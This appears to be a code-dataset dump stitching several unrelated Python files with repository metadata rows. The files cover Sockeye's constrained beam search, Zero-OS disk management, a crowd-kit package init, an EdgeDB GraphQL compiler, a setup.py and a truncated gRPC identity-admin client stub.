# form (constraint, whether it's a non-initial sequential, whether it's been met)
constraint_tuples = list(zip(obj.constraints, [False] + obj.is_sequence[:-1], obj.met))
# We are searching for an unmet constraint (word_id) that is not the middle of a phrase and is not met
query = (word_id, False, False)
try:
pos = constraint_tuples.index(query)
obj.met[pos] = True
obj.last_met = pos
except ValueError:
# query not found; identical but duplicated object will be returned
pass
return obj
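# A minimal sketch of the bookkeeping above, using the docstring example
# [[14], [19, 35, 14]] (eos_id=0 is an illustrative value; defined but never
# called):
def _constrained_hypothesis_sketch():
    hyp = ConstrainedHypothesis([[14], [19, 35, 14]], eos_id=0)
    assert hyp.size() == 4 and hyp.allowed() == {14, 19}
    hyp = hyp.advance(19)          # starts the phrasal constraint
    assert hyp.allowed() == {35}   # must continue with 19 -> 35 -> 14
    hyp = hyp.advance(35).advance(14).advance(14)
    assert hyp.finished() and hyp.num_met() == 4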
def init_batch(raw_constraints: List[Optional[RawConstraintList]],
beam_size: int,
start_id: int,
eos_id: int) -> List[Optional[ConstrainedHypothesis]]:
"""
:param raw_constraints: The list of raw constraints (list of list of IDs).
:param beam_size: The beam size.
:param start_id: The target-language vocabulary ID of the SOS symbol.
:param eos_id: The target-language vocabulary ID of the EOS symbol.
:return: A list of ConstrainedHypothesis objects (shape: (batch_size * beam_size,)).
"""
constraints = [None] * (len(raw_constraints) * beam_size) # type: List[Optional[ConstrainedHypothesis]]
if any(raw_constraints):
for i, raw_list in enumerate(raw_constraints):
num_constraints = sum([len(phrase) for phrase in raw_list]) if raw_list is not None else 0
if num_constraints > 0:
hyp = ConstrainedHypothesis(raw_list, eos_id)
idx = i * beam_size
constraints[idx:idx + beam_size] = [hyp.advance(start_id) for x in range(beam_size)]
return constraints
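# init_batch yields one entry per beam slot, e.g. for a batch of two sentences
# with beam size 3 where only the first sentence carries constraints:
# [hyp, hyp, hyp, None, None, None], each hyp already advanced on start_id.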
def get_bank_sizes(num_constraints: int,
beam_size: int,
candidate_counts: List[int]) -> List[int]:
"""
Evenly distributes the beam across the banks, where each bank is a portion of the beam devoted
to hypotheses having met the same number of constraints, 0..num_constraints.
After the assignment, banks with more slots than candidates are adjusted.
:param num_constraints: The number of constraints.
:param beam_size: The beam size.
:param candidate_counts: The empirical counts of number of candidates in each bank.
:return: A distribution over banks.
"""
num_banks = num_constraints + 1
bank_size = beam_size // num_banks
remainder = beam_size - bank_size * num_banks
# Distribute any remainder to the end
assigned = [bank_size for x in range(num_banks)]
assigned[-1] += remainder
# Now, moving right to left, push extra allocation to earlier buckets.
# This encodes a bias for higher buckets, but if no candidates are found, space
# will be made in lower buckets. This may not be the best strategy, but it is important
# that you start pushing from the bucket that is assigned the remainder, for cases where
# num_constraints >= beam_size.
for i in reversed(range(num_banks)):
overfill = assigned[i] - candidate_counts[i]
if overfill > 0:
assigned[i] -= overfill
assigned[(i - 1) % num_banks] += overfill
return assigned
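# Two worked examples for the assignment above (illustrative counts; defined
# but never called): 2 constraints and a beam of 5, so banks start as [1, 1, 3]
# before overfilled banks push their surplus towards lower banks.
def _bank_size_sketch():
    assert get_bank_sizes(2, 5, [1, 1, 10]) == [1, 1, 3]
    assert get_bank_sizes(2, 5, [5, 0, 1]) == [4, 0, 1]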
class ConstrainedCandidate:
"""
Object used to hold candidates for the beam in topk().
:param row: The row in the scores matrix.
:param col: The column (word ID) in the scores matrix.
:param score: the associated accumulated score.
:param hypothesis: The ConstrainedHypothesis containing information about met constraints.
"""
__slots__ = ('row', 'col', 'score', 'hypothesis')
def __init__(self,
row: int,
col: int,
score: float,
hypothesis: ConstrainedHypothesis) -> None:
self.row = row
self.col = col
self.score = score
self.hypothesis = hypothesis
def __hash__(self):
return hash((self.row, self.col))
def __eq__(self, other):
return self.row == other.row and self.col == other.col
def __str__(self):
return '({}, {}, {}, {})'.format(self.row, self.col, self.score, self.hypothesis.num_met())
def topk(timestep: int,
batch_size: int,
beam_size: int,
inactive: mx.nd.NDArray,
scores: mx.nd.NDArray,
hypotheses: List[ConstrainedHypothesis],
best_ids: mx.nd.NDArray,
best_word_ids: mx.nd.NDArray,
seq_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array, List[ConstrainedHypothesis], mx.nd.NDArray]:
"""
Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints.
These items are built from three different types: (1) the best items across the whole
scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row.
:param timestep: The current decoder timestep.
:param batch_size: The number of segments in the batch.
:param beam_size: The length of the beam for each segment.
:param inactive: Array listing inactive rows (shape: (beam_size,)).
:param scores: The scores array (shape: (batch_size if t==1 else beam_size, target_vocab_size)).
:param hypotheses: The list of hypothesis objects.
:param best_ids: The current list of best hypotheses (shape: (beam_size,)).
:param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)).
:param seq_scores: (shape: (beam_size, 1)).
:return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores,
the updated constrained hypotheses, and the updated set of inactive hypotheses.
"""
for sentno in range(batch_size):
rows = slice(sentno * beam_size, sentno * beam_size + beam_size)
if hypotheses[rows.start] is not None and hypotheses[rows.start].size() > 0:
best_ids[rows], best_word_ids[rows], seq_scores[rows], \
hypotheses[rows], inactive[rows] = _sequential_topk(timestep,
beam_size,
inactive[rows],
scores[rows],
hypotheses[rows],
best_ids[rows] - rows.start,
best_word_ids[rows],
seq_scores[rows])
# offsetting since the returned smallest_k() indices were slice-relative
best_ids[rows] += rows.start
else:
# If there are no constraints for this sentence in the batch, everything stays
# the same, except we need to mark all hypotheses as active
inactive[rows] = 0
return best_ids, best_word_ids, seq_scores, hypotheses, inactive
def _sequential_topk(timestep: int,
beam_size: int,
inactive: mx.nd.NDArray,
scores: mx.nd.NDArray,
hypotheses: List[ConstrainedHypothesis],
best_ids: mx.nd.NDArray,
best_word_ids: mx.nd.NDArray,
sequence_scores: mx.nd.NDArray) -> Tuple[np.array, np.array, np.array,
List[ConstrainedHypothesis], mx.nd.NDArray]:
"""
Builds a new topk list such that the beam contains hypotheses having completed different numbers of constraints.
These items are built from three different types: (1) the best items across the whole
scores matrix, (2) the set of words that must follow existing constraints, and (3) k-best items from each row.
:param timestep: The current decoder timestep.
:param beam_size: The length of the beam for each segment.
:param inactive: Array listing inactive rows (shape: (beam_size,)).
:param scores: The scores array (shape: (beam_size, target_vocab_size)).
:param hypotheses: The list of hypothesis objects.
:param best_ids: The current list of best hypotheses (shape: (beam_size,)).
:param best_word_ids: The parallel list of best word IDs (shape: (beam_size,)).
:param sequence_scores: (shape: (beam_size, 1)).
:return: A tuple containing the best hypothesis rows, the best hypothesis words, the scores,
the updated constrained hypotheses, and the updated set of inactive hypotheses.
"""
num_constraints = hypotheses[0].size()
candidates = set()
    # (1) Add all of the top-k items (which were passed in) as long as they satisfy the constraints
for row, col, seq_score in zip(best_ids, best_word_ids, sequence_scores):
row = int(row.asscalar())
col = int(col.asscalar())
if hypotheses[row] is not None and hypotheses[row].is_valid(col):
seq_score = float(seq_score.asscalar())
new_item = hypotheses[row].advance(col)
cand = ConstrainedCandidate(row, col, seq_score, new_item)
candidates.add(cand)
# For each hypothesis, we add (2) all the constraints that could follow it and
# (3) the best item (constrained or not) in that row
best_next = mx.nd.argmin(scores, axis=1)
for row in range(beam_size):
if inactive[row]:
continue
hyp = hypotheses[row]
# (2) add all the constraints that could extend this
nextones = hyp.allowed()
# (3) add the single-best item after this (if it's valid)
col = int(best_next[row].asscalar())
if hyp.is_valid(col):
nextones.add(col)
# Now, create new candidates for each of these items
for col in nextones:
new_item = hyp.advance(col)
score = scores[row, col].asscalar()
cand = ConstrainedCandidate(row, col, score, new_item)
candidates.add(cand)
# Sort the candidates. After allocating the beam across the banks, we will pick the top items
# for each bank from this list
sorted_candidates = sorted(candidates, key=attrgetter('score'))
# The number of hypotheses in each bank
counts = [0 for _ in range(num_constraints + 1)]
for cand in sorted_candidates:
counts[cand.hypothesis.num_met()] += 1
# Adjust allocated bank sizes if there are too few candidates in any of them
bank_sizes = get_bank_sizes(num_constraints, beam_size, counts)
# Sort the candidates into the allocated banks
pruned_candidates = [] # type: List[ConstrainedCandidate]
for i, cand in enumerate(sorted_candidates):
bank = cand.hypothesis.num_met()
if bank_sizes[bank] > 0:
pruned_candidates.append(cand)
bank_sizes[bank] -= 1
num_pruned_candidates = len(pruned_candidates)
inactive[:num_pruned_candidates] = 0
# Pad the beam so array assignment still works
if num_pruned_candidates < beam_size:
inactive[num_pruned_candidates:] = 1
pruned_candidates += [pruned_candidates[num_pruned_candidates - 1]] * (beam_size - num_pruned_candidates)
return (np.array([x.row for x in pruned_candidates]),
np.array([x.col for x in pruned_candidates]),
np.array([[x.score] for x in pruned_candidates]),
[x.hypothesis for x in pruned_candidates],
inactive)
def main(args):
"""
    Usage: python3 -m sockeye.lexical_constraints [--avoid]
Reads sentences and constraints on STDIN (tab-delimited) and generates the JSON format
that can be used when passing `--json-input` to sockeye.translate. It supports both positive
constraints (phrases that must appear in the output) and negative constraints (phrases that
must *not* appear in the output).
e.g.,
echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints
will produce the following JSON object:
{ "text": "Das ist ein Test .", "constraints": ["This is", "test"] }
If you pass `--avoid` to the script, the constraints will be generated as negative constraints, instead:
echo -e "Das ist ein Test .\tThis is\ttest" | python3 -m sockeye.lexical_constraints --avoid
will produce the following JSON object (note the new keyword):
{ "text": "Das ist ein Test .", "avoid": ["This is", "test"] }
Make sure you apply all preprocessing (tokenization, BPE, etc.) to both the source and the target-side constraints.
You can then translate this object by passing it to Sockeye on STDIN as follows:
python3 -m sockeye.translate -m /path/to/model --json-input --beam-size 20 --beam-prune 20
Note the recommended Sockeye parameters. Beam pruning isn't needed for negative constraints.
"""
import sys
import json
for line in sys.stdin:
line = line.rstrip()
# Constraints are in fields 2+
source, *restrictions = line.split('\t')
obj = {'text': source}
constraints = []
avoid_list = []
for item in restrictions:
if args.avoid:
avoid_list.append(item)
else:
constraints.append(item)
if constraints:
obj['constraints'] = constraints
if avoid_list:
obj['avoid'] = avoid_list
print(json.dumps(obj, ensure_ascii=False), flush=True)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--avoid', action='store_true', help='Constraints are negative constraints')
args = parser.parse_args()
main(args)
| 40.990028 | 119 | 0.625856 |
47dd13a1f9a3cacc2e773f17563dcf302f925b6e | 5,932 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 1 | 2020-10-05T08:53:57.000Z | 2020-10-05T08:53:57.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 17 | 2019-11-14T08:41:37.000Z | 2020-05-27T09:23:51.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/sal_zos/disks/Disks.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | null | null | null | from enum import Enum
from ..abstracts import Mountable
from .Partition import Partition
from Jumpscale import j
class StorageType(Enum):
SSD = "SSD"
HDD = "HDD"
NVME = "NVME"
ARCHIVE = "ARCHIVE"
CDROM = "CDROM"
class Disks:
"""Subobject to list disks"""
def __init__(self, node):
self.node = node
@property
def client(self):
return self.node.client
def list(self):
"""
List of disks on the node
"""
disks = []
for disk_info in self.client.disk.list():
disks.append(Disk(node=self.node, disk_info=disk_info))
return disks
def get(self, name):
"""
return the disk called `name`
@param name: name of the disk
"""
for disk in self.list():
if disk.name == name:
return disk
return None
def get_device(self, name):
"""
        Get a device, which can be either a disk or a partition
        @param name: full device name of the disk or partition (e.g. /dev/sda1)
@type name: str
@return: Disk or Partition
@rtype: Disk Partition
"""
for disk in self.list():
if disk.devicename == name:
return disk
for partition in disk.partitions:
if partition.devicename == name:
return partition
raise j.exceptions.NotFound("Could not find device with name {}".format(name))
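# Illustrative sketch (editor's addition): looking devices up on a hypothetical
# Zero-OS node handle. Note that get() matches the short disk name while
# get_device() matches the full device path and raises NotFound when nothing matches.
def _example_lookup(node):
    disks = Disks(node)
    sda = disks.get("sda")                 # whole disk by short name, or None
    part = disks.get_device("/dev/sda1")   # disk or partition by device path
    return sda, part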
class Disk(Mountable):
"""Disk in a Zero-OS"""
def __init__(self, node, disk_info):
"""
disk_info: dict returned by client.disk.list()
"""
# g8os client to talk to the node
Mountable.__init__(self)
self.node = node
self.name = None
self.size = None
self.blocksize = None
self.partition_table = None
self.mountpoint = None
self.model = None
self._filesystems = []
self._type = None
self.partitions = []
self.transport = None
self._disk_info = disk_info
self._load(disk_info)
@property
def client(self):
return self.node.client
@property
def devicename(self):
return "/dev/{}".format(self.name)
@property
def filesystems(self):
self._populate_filesystems()
return self._filesystems
@property
def type(self):
"""
return the type of the disk
"""
if self._type is None:
if self._disk_info["type"] == "rom":
self._type = StorageType.CDROM
else:
res = self.node.client.disk.seektime(self.devicename)
                # assume that if a disk is more than 7TB it's an SMR disk
if res["type"] == "HDD":
if int(self._disk_info["size"]) > (1024 * 1024 * 1024 * 1024 * 7):
self._type = StorageType.ARCHIVE
else:
self._type = StorageType.HDD
elif res["type"] in ["SSD", "SDD"]:
if "nvme" in self._disk_info["name"]:
self._type = StorageType.NVME
else:
self._type = StorageType.SSD
return self._type
def _load(self, disk_info):
self.name = disk_info["name"]
self.size = int(disk_info["size"])
self.blocksize = disk_info["blocksize"] if "blocksize" in disk_info else None
if "table" in disk_info and disk_info["table"] != "unknown":
self.partition_table = disk_info["table"]
self.mountpoint = disk_info["mountpoint"]
self.model = disk_info["model"]
self.transport = disk_info["tran"]
for partition_info in disk_info.get("children", []) or []:
self.partitions.append(Partition(disk=self, part_info=partition_info))
def _populate_filesystems(self):
"""
        look into all the btrfs filesystems and populate
        the filesystems attribute of the class with the details of
        all the filesystems present on the disk
"""
disk_devices_names = [self.devicename]
disk_devices_names.extend([part.devicename for part in self.partitions])
self._filesystems = []
for fs in self.client.btrfs.list() or []:
for device in fs["devices"]:
if device["path"] in disk_devices_names:
self._filesystems.append(fs)
def mktable(self, table_type="gpt", overwrite=False):
"""
create a partition table on the disk
@param table_type: Partition table type as accepted by parted
@param overwrite: erase any existing partition table
"""
if self.partition_table is not None and overwrite is False:
return
self.client.disk.mktable(disk=self.name, table_type=table_type)
def mkpart(self, start, end, part_type="primary"):
"""
@param start: partition start as accepted by parted mkpart
@param end: partition end as accepted by parted mkpart
@param part_type: partition type as accepted by parted mkpart
"""
before = {p.name for p in self.partitions}
self.client.disk.mkpart(self.name, start=start, end=end, part_type=part_type)
after = {}
for disk in self.client.disk.list():
if disk["name"] != self.name:
continue
for part in disk.get("children", []):
after[part["name"]] = part
name = set(after.keys()) - before
part_info = after[list(name)[0]]
partition = Partition(disk=self, part_info=part_info)
self.partitions.append(partition)
return partition
def __str__(self):
return "Disk <{}>".format(self.name)
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.devicename == other.devicename
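# Illustrative sketch (editor's addition): partitioning a blank disk on a hypothetical
# Zero-OS node handle. The start/end strings follow parted's mkpart syntax.
def _example_partition(node):
    disk = Disks(node).get("sdb")
    disk.mktable(table_type="gpt", overwrite=False)  # no-op if a table already exists
    part = disk.mkpart(start="1MiB", end="100%", part_type="primary")
    return part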
| 30.57732 | 86 | 0.568105 |
667bcf9e07a82b5019713d95c61d2a69286d7b9b | 249 | py | Python | build/lib/crowdkit/aggregation/image_segmentation/__init__.py | artinmajdi/crowd-kit | 174e15f256a4929ed71699ffc1797ea87e0e8a99 | [
"Apache-2.0"
] | 91 | 2021-03-02T19:29:04.000Z | 2022-03-24T15:25:06.000Z | build/lib/crowdkit/aggregation/image_segmentation/__init__.py | artinmajdi/crowd-kit | 174e15f256a4929ed71699ffc1797ea87e0e8a99 | [
"Apache-2.0"
] | 5 | 2021-07-01T07:24:08.000Z | 2021-09-19T19:15:40.000Z | src/aggregation/image_segmentation/__init__.py | Toloka/crowd-kit | 126942242781073235ca292aed9f496b614e9516 | [
"Apache-2.0"
] | 6 | 2021-05-21T12:40:29.000Z | 2022-03-28T06:23:24.000Z | from .segmentation_em import SegmentationEM
from .segmentation_rasa import SegmentationRASA
from .segmentation_majority_vote import SegmentationMajorityVote
__all__ = [
'SegmentationEM',
'SegmentationRASA',
'SegmentationMajorityVote'
]
| 24.9 | 64 | 0.815261 |
31c224b008de2a99bcc894b8a0b8c31a9b450a16 | 3,690 | py | Python | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | 4 | 2020-04-25T13:52:13.000Z | 2020-09-23T19:14:07.000Z | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | null | null | null | edb/server/http_graphql_port/compiler.py | pnijhara/edgedb | 04e47118ef4d2af5dca1a6bd937bb737873329c9 | [
"Apache-2.0"
] | null | null | null | #
# This source file is part of the EdgeDB open source project.
#
# Copyright 2019-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import dataclasses
import immutables
from edb import errors
from edb import graphql
from edb.common import debug
from edb.edgeql import compiler as qlcompiler
from edb.pgsql import compiler as pg_compiler
from edb.server import compiler
if TYPE_CHECKING:
from edb.schema import schema as s_schema
@dataclasses.dataclass(frozen=True)
class CompilerDatabaseState(compiler.CompilerDatabaseState):
gqlcore: graphql.GQLCoreSchema
@dataclasses.dataclass(frozen=True)
class CompiledOperation:
sql: bytes
sql_hash: bytes
sql_args: List[str]
dbver: int
cacheable: bool
cache_deps_vars: Optional[FrozenSet[str]]
variables: Dict
class Compiler(compiler.BaseCompiler):
def _wrap_schema(
self,
dbver: int,
schema: s_schema.Schema,
cached_reflection: immutables.Map[str, Tuple[str, ...]],
) -> CompilerDatabaseState:
gqlcore = graphql.GQLCoreSchema(schema)
return CompilerDatabaseState(
dbver=dbver,
schema=schema,
cached_reflection=cached_reflection,
gqlcore=gqlcore,
)
async def compile_graphql(
self,
dbver: int,
gql: str,
tokens: Optional[List[Tuple[int, int, int, str]]],
substitutions: Optional[Dict[str, Tuple[str, int, int]]],
operation_name: str=None,
variables: Optional[Mapping[str, object]]=None,
) -> CompiledOperation:
db = await self._get_database(dbver)
if tokens is None:
ast = graphql.parse_text(gql)
else:
ast = graphql.parse_tokens(gql, tokens)
op = graphql.translate_ast(
db.gqlcore,
ast,
variables=variables,
substitutions=substitutions,
operation_name=operation_name)
ir = qlcompiler.compile_ast_to_ir(
op.edgeql_ast,
schema=db.schema,
options=qlcompiler.CompilerOptions(
json_parameters=True,
),
)
if ir.cardinality.is_multi():
raise errors.ResultCardinalityMismatchError(
                f'compiled GraphQL query has cardinality {ir.cardinality}, '
f'expected ONE')
sql_text, argmap = pg_compiler.compile_ir_to_sql(
ir,
pretty=debug.flags.edgeql_compile,
expected_cardinality_one=True,
output_format=pg_compiler.OutputFormat.JSON)
args = [None] * len(argmap)
for argname, param in argmap.items():
args[param.index - 1] = argname
sql_bytes = sql_text.encode()
sql_hash = self._hash_sql(sql_bytes)
return CompiledOperation(
sql=sql_bytes,
sql_hash=sql_hash,
sql_args=args,
dbver=dbver,
cacheable=op.cacheable,
cache_deps_vars=op.cache_deps_vars,
variables=op.variables_desc,
)
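# Illustrative sketch (editor's addition): compiling a plain GraphQL query text with an
# already-constructed Compiler instance. The query string and dbver value are
# hypothetical; tokens and substitutions are None when the raw text is parsed directly.
async def _example_compile_graphql(graphql_compiler: Compiler, dbver: int):
    op = await graphql_compiler.compile_graphql(
        dbver,
        'query { User { name } }',
        tokens=None,
        substitutions=None,
    )
    return op.sql, op.sql_args  # SQL bytes plus the ordered argument names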
| 28.167939 | 76 | 0.649593 |
090cd2d1629e8f800772c74341be56047a035cb3 | 882 | py | Python | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | 1 | 2019-03-13T13:58:40.000Z | 2019-03-13T13:58:40.000Z | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | null | null | null | setup.py | alxmamaev/kekas | f0d8f9643e89757ae44a679ecba64454b1236e10 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="kekas",
version="0.1.8",
author="Aleksandr Belskikh",
author_email="belskikh.aleksandr@gmail.com",
description="Jast another DL library.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/belskikh/kekas",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
license="MIT",
python_requires=">=3.6.0",
packages=setuptools.find_packages(),
install_requires=[
"pandas>=0.22",
"numpy>=1.14.6",
"tensorboardX>=1.6",
"torch>=0.4.1",
"torchvision>=0.2.1",
"tqdm>=4.29.1",
"scikit-learn>=0.20"
]
)
| 25.941176 | 50 | 0.602041 |
686da7dff3cdf3899c62281f75d6dbd9570f5cf2 | 64,833 | py | Python | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | auth3/identity/admin/admin_pb2_grpc.py | auth3-dev/python-sdk | 0a31cf3307441c5ba8220ab5e1f8b30dc3780ee9 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from auth3.identity.admin import admin_pb2 as devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2
class AdminStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString,
)
self.GetIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString,
)
self.GetIdentitiesByAttribute = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString,
)
self.GetIdentities = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString,
)
self.UpdateIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString,
)
self.DeleteIdentity = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString,
)
self.GetAddresses = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString,
)
self.GetAddress = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetAddress',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString,
)
self.UpdateAddress = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString,
)
self.GetTraits = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetTraits',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString,
)
self.UpdateTraits = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString,
)
self.GetCredentials = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString,
)
self.UpdateCredential = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString,
)
self.GetIdentityLoginAttempts = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString,
)
self.CreateConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString,
)
self.GetConnections = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/GetConnections',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString,
)
self.UpdateConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString,
)
self.DeleteConnection = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString,
response_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString,
)
self.CreateIdSchema = channel.unary_unary(
'/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema',
request_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString,
